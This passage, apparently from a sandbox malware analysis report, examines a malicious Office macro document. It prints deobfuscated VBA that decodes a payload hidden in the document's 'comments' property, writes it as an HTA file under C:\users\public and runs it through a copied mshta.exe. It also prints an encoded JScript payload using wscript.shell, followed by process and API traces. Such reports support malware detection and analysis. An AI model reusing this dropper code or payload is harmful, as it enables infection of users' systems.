"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) -> 17902 executed
11	aJjwu = 0
15	aMnjk = Mid(a2cCM, as6h1W, 1)	Mid
16	aDKIk = Asc(aMnjk)	Asc
21	If (aDKIk > 64 And aDKIk < 91) Or (aDKIk > 96 And aDKIk < 123) Then
22	aJjwu = as8nLc	as8nLc
23	aDKIk = aYzBn(aDKIk, aJjwu)
28	If aDKIk < a3eJx(5) And aDKIk > 83 Then
29	aDKIk = a3ox6(aDKIk)
30	Elseif aDKIk < 128 - 63 Then
31	aDKIk = a3ox6(aDKIk)
32	Endif
33	Endif
34	anFJy = a9vceZ(aDKIk)
35	MidDollar (a2cCM, as6h1W, 1) = adBRr(anFJy)
36	Next	Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) \| (rap2 >> 4); pue2 = ((rap2 & 15) << 4) \| (rap3 >> 2); pue3 = ((rap3 & 3) << 6) \| rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "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) -> 17902 executed
41	a6sXJE = a2cCM
42	End Function

Module: aRZcbw

Declaration

Line	Content
1	Attribute VB_Name = "aRZcbw"
2	Public Const a3IdJQ as String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
3	Public Const a7odJ as String = ")"
4	Public Const as8nLc as Integer = 30602 / 2354

Executed Functions

Function a8qpd, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
BuiltInDocumentProperties

Line	Instruction	Meta Information
33	Function a8qpd(afAV8)
42	a8qpd = ActiveDocument.BuiltInDocumentProperties(afAV8)	BuiltInDocumentProperties executed
43	End Function

Subroutine aYKyQ, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
44	Public Sub aYKyQ()
48	If - 342 + 406 < 164 Then	executed
49	Call aVzRp()
50	Endif
51	End Sub

Subroutine axIuO, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
52	Public Sub axIuO()
53	If - 342 + 406 < 164 Then	executed
54	Call ah28l()
55	Endif
56	End Sub

Non-Executed Functions

Function aG87E, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
5	Function aG87E()
10	End Function

Subroutine a7zcHr, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
11	Sub a7zcHr(aFtIw)
32	End Sub

Module: abh0Rg

Declaration

Line	Content
1	Attribute VB_Name = "abh0Rg"

Executed Functions

Function aX4od, APIs: 2, Strings: 0, Number of lines: 6, Relevance: 4.506

APIs	Meta Information
FreeFile
Open	Open("C:\users\public\ms.html")

Line	Instruction	Meta Information
2	Public Function aX4od(aVOhvn, aA5aKj)
26	FileNumber = FreeFile	FreeFile executed
27	Open aVOhvn For Output As # FileNumber	Open("C:\users\public\ms.html") executed
32	Print # FileNumber, aA5aKj
37	Close # FileNumber
38	End Function

Subroutine amZcqK, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
FileCopy

Line	Instruction	Meta Information
39	Sub amZcqK(aH6Oa, aicyF)
50	FileCopy aH6Oa, aicyF	FileCopy executed
51	End Sub

Function adBRr, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
52	Function adBRr(avhZYf)
53	adBRr = avhZYf	executed
54	End Function

Module: adGbPA

Declaration

Line	Content
1	Attribute VB_Name = "adGbPA"

Executed Functions

Subroutine ah28l, APIs: 7, Strings: 1, Number of lines: 4, Relevance: 12.004

APIs	Meta Information
Part of subcall function aX4od@abh0Rg: FreeFile
Part of subcall function aX4od@abh0Rg: Open
Part of subcall function a6sXJE@aOMv0: Len
Part of subcall function a6sXJE@aOMv0: Mid
Part of subcall function a6sXJE@aOMv0: Asc
Part of subcall function a6sXJE@aOMv0: as8nLc
Part of subcall function a8qpd@aRZcbw: BuiltInDocumentProperties

Strings	Decrypted Strings
"comments"

Line	Instruction	Meta Information
54	Sub ah28l()
55	aocn4g = ayUxA2(adkJvD(2))	executed
56	aX4od aocn4g, a6sXJE(a8qpd("comments"))
57	End Sub

Function aGSfMv, APIs: 3, Strings: 2, Number of lines: 3, Relevance: 7.503

APIs	Meta Information
Split
Part of subcall function aSGxU@a7A5m: Len
Part of subcall function aSGxU@a7A5m: Mid

Strings	Decrypted Strings
"l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)"
"\|"

Line	Instruction	Meta Information
2	Function aGSfMv()
3	aGSfMv = VBA.Split(aSGxU("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)"), "\|")	Split executed
4	End Function

Function adkJvD, APIs: 1, Strings: 0, Number of lines: 11, Relevance: 1.261

APIs	Meta Information
Part of subcall function aGSfMv@adGbPA: Split

Line	Instruction	Meta Information
5	Function adkJvD(ah7ovz)
10	apa2Q = aGSfMv()	executed
30	Select Case ah7ovz
35	Case 0
40	adkJvD = apa2Q(1)
45	Case 1
46	adkJvD = apa2Q(2)
50	Case 2
51	adkJvD = apa2Q(3)
52	End Select
53	End Function

Reset < >

Analysis Process: ms.com PID: 2524 Parent PID: 1220 ms.comCOMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.6%
Total number of Nodes:	83
Total number of Limit Nodes:	4

Executed Functions

Function 000000013F2A1238, Relevance: 54.5, APIs: 25, Strings: 6, Instructions: 202
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000013F2A1520: GetVersionExA.KERNEL32 ref: 000000013F2A153F

rand_s.MSVCRT ref: 000000013F2A1297
VirtualAlloc.KERNEL32 ref: 000000013F2A12C1
GetVersion.KERNEL32 ref: 000000013F2A12CF
GetModuleHandleW.KERNEL32 ref: 000000013F2A12E4
GetProcAddress.KERNEL32 ref: 000000013F2A12F9
??2@YAPEAX_K@Z.MSVCRT ref: 000000013F2A1323
??2@YAPEAX_K@Z.MSVCRT ref: 000000013F2A132E
RegOpenKeyExA.ADVAPI32 ref: 000000013F2A1366
RegQueryValueExA.ADVAPI32 ref: 000000013F2A138F
ExpandEnvironmentStringsA.KERNEL32 ref: 000000013F2A13B1
LoadLibraryA.KERNEL32 ref: 000000013F2A13CC
??3@YAXPEAX@Z.MSVCRT ref: 000000013F2A13D8
??3@YAXPEAX@Z.MSVCRT ref: 000000013F2A13E1
RegCloseKey.ADVAPI32 ref: 000000013F2A13F5
GetModuleHandleW.KERNEL32 ref: 000000013F2A1407
GetProcAddress.KERNEL32 ref: 000000013F2A1420
??2@YAPEAX_K@Z.MSVCRT ref: 000000013F2A1455
MultiByteToWideChar.KERNEL32 ref: 000000013F2A1478
UnregisterApplicationRestart.KERNEL32 ref: 000000013F2A1487
??3@YAXPEAX@Z.MSVCRT ref: 000000013F2A148D
GetProcAddress.KERNEL32 ref: 000000013F2A14AD
FreeLibrary.KERNEL32 ref: 000000013F2A14C9
??3@YAXPEAX@Z.MSVCRT ref: 000000013F2A14D7
??3@YAXPEAX@Z.MSVCRT ref: 000000013F2A14E5
RegCloseKey.ADVAPI32 ref: 000000013F2A14F8

Strings

Kernel32.dll, xrefs: 000000013F2A12DD
kernel32.dll, xrefs: 000000013F2A1400
RegisterApplicationRestart, xrefs: 000000013F2A1416
RunHTMLApplication, xrefs: 000000013F2A14A3
HeapSetInformation, xrefs: 000000013F2A12EF
clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, xrefs: 000000013F2A134D

Memory Dump Source

Source File: 00000002.00000002.2363433933.000000013F2A1000.00000020.00020000.sdmp, Offset: 000000013F2A0000, based on PE: true

Associated: 00000002.00000002.2363396090.000000013F2A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.2363468817.000000013F2A3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13f2a0000_ms.jbxd

Similarity

API ID: ??3@$??2@AddressProc$CloseHandleLibraryModuleVersion$AllocApplicationByteCharEnvironmentExpandFreeLoadMultiOpenQueryRestartStringsUnregisterValueVirtualWiderand_s
String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
API String ID: 2716239066-299297891
Opcode ID: 8e13042b436c24f575a4d42fd3423c6b145c96f7184e519e0d58014c43974360
Instruction ID: 613494773a120f8242cad46082e3a06209b52081cfa59b72db6bec7f0642e1b4
Opcode Fuzzy Hash: 8e13042b436c24f575a4d42fd3423c6b145c96f7184e519e0d58014c43974360
Instruction Fuzzy Hash: 45814D31B00A50C6FF589F66A8547EB27A1BB45BB4F044639CE29577E4EF38C65E8B00

Uniqueness

Uniqueness Score: -1.00%

Function 02E10215, Relevance: 21.4, Strings: 16, Instructions: 1395COMMON

Download Yara Rule

Strings

83A, xrefs: 02E11144
`.0, xrefs: 02E10666
`.0, xrefs: 02E1051E
8`@, xrefs: 02E112A9
88A, xrefs: 02E10E41
`.0, xrefs: 02E103D2
X6A, xrefs: 02E10F80
`.0, xrefs: 02E1028A
x9A, xrefs: 02E10D64
0!1, xrefs: 02E111D3
x4A, xrefs: 02E110BD
Xc@, xrefs: 02E111B0
xa@, xrefs: 02E1125B
@, xrefs: 02E10846
0!1, xrefs: 02E11291
X;A, xrefs: 02E10C6B

Memory Dump Source

Source File: 00000002.00000002.2352816536.0000000002E10000.00000010.00000001.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e10000_ms.jbxd

Similarity

API ID:
String ID: 0!1$0!1$83A$88A$8`@$@$X6A$X;A$Xc@$`.0$`.0$`.0$`.0$x4A$x9A$xa@
API String ID: 0-1995578618
Opcode ID: 9741eb71c93875f47b96f066a25d6bdabfe7fdfd2ca7a8089aa4a12a3a0bb6d2
Instruction ID: f0b06b3d3016f65363cbf837b2dc92914ba9b5c38190690c4102442cfa79c96f
Opcode Fuzzy Hash: 9741eb71c93875f47b96f066a25d6bdabfe7fdfd2ca7a8089aa4a12a3a0bb6d2
Instruction Fuzzy Hash: 63922330618B884FDB59E77C98543687BE2FB9A348F5450BAD84ACB392DA20DCD1C791

Uniqueness

Uniqueness Score: -1.00%

Function 000000013F2A1944, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 000000013F2A194F

Memory Dump Source

Source File: 00000002.00000002.2363433933.000000013F2A1000.00000020.00020000.sdmp, Offset: 000000013F2A0000, based on PE: true

Associated: 00000002.00000002.2363396090.000000013F2A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.2363468817.000000013F2A3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13f2a0000_ms.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 368824ead7e862b12fb582b5ab065bece72bfba5a9319f2532e100dbb248ddeb
Instruction ID: c36f88ac409d6365c271a34ca5946ec672313858283e4d978e7049703e260318
Opcode Fuzzy Hash: 368824ead7e862b12fb582b5ab065bece72bfba5a9319f2532e100dbb248ddeb
Instruction Fuzzy Hash: 48B00224E52445D5EA08AB61AD967D612A06798715FD10475810985160DF5CD6AFDB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013F2A1680, Relevance: 12.1, APIs: 8, Instructions: 135
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000013F2A1B14: GetSystemTimeAsFileTime.KERNEL32 ref: 000000013F2A1B44
Part of subcall function 000000013F2A1B14: GetCurrentProcessId.KERNEL32 ref: 000000013F2A1B52
Part of subcall function 000000013F2A1B14: GetCurrentThreadId.KERNEL32 ref: 000000013F2A1B5E
Part of subcall function 000000013F2A1B14: GetTickCount.KERNEL32 ref: 000000013F2A1B6A
Part of subcall function 000000013F2A1B14: GetTickCount.KERNEL32 ref: 000000013F2A1B7A
Part of subcall function 000000013F2A1B14: QueryPerformanceCounter.KERNEL32 ref: 000000013F2A1B95

GetStartupInfoW.KERNEL32 ref: 000000013F2A16B5
Sleep.KERNEL32 ref: 000000013F2A16E9
_amsg_exit.MSVCRT ref: 000000013F2A16FF
_initterm.MSVCRT ref: 000000013F2A1784
_IsNonwritableInCurrentImage.LIBCMT ref: 000000013F2A17B1
exit.MSVCRT ref: 000000013F2A1838
_cexit.MSVCRT ref: 000000013F2A1847
_ismbblead.MSVCRT ref: 000000013F2A186A

Memory Dump Source

Source File: 00000002.00000002.2363433933.000000013F2A1000.00000020.00020000.sdmp, Offset: 000000013F2A0000, based on PE: true

Associated: 00000002.00000002.2363396090.000000013F2A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.2363468817.000000013F2A3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13f2a0000_ms.jbxd

Similarity

API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
String ID:
API String ID: 2995914023-0
Opcode ID: 2d6de00aaaa962bd930e1e12a0d39693ee0e8b99abded242dc875d2961d4ea5d
Instruction ID: 94919a028856875a969647569c49001ad16123e08c46e0ea684085ceca0f8723
Opcode Fuzzy Hash: 2d6de00aaaa962bd930e1e12a0d39693ee0e8b99abded242dc875d2961d4ea5d
Instruction Fuzzy Hash: 57511631E05640CAFF658B20E8407EB76E1B754B64F58103DDA4A866E5DF38CA5FCB01

Uniqueness

Uniqueness Score: -1.00%

Function 02940FB1, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2351521546.0000000002940000.00000010.00000001.sdmp, Offset: 02940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2940000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: cdf6cdc6764cbef8435224524976875ae867f70a9393e210ef1afac051954790
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02940FB9, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2351521546.0000000002940000.00000010.00000001.sdmp, Offset: 02940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2940000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: cdf6cdc6764cbef8435224524976875ae867f70a9393e210ef1afac051954790
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02940FA9, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2351521546.0000000002940000.00000010.00000001.sdmp, Offset: 02940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2940000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: cdf6cdc6764cbef8435224524976875ae867f70a9393e210ef1afac051954790
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02940FC1, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2351521546.0000000002940000.00000010.00000001.sdmp, Offset: 02940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2940000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: cdf6cdc6764cbef8435224524976875ae867f70a9393e210ef1afac051954790
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000000013F2A1B14, Relevance: 9.0, APIs: 6, Instructions: 47
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000013F2A1B44
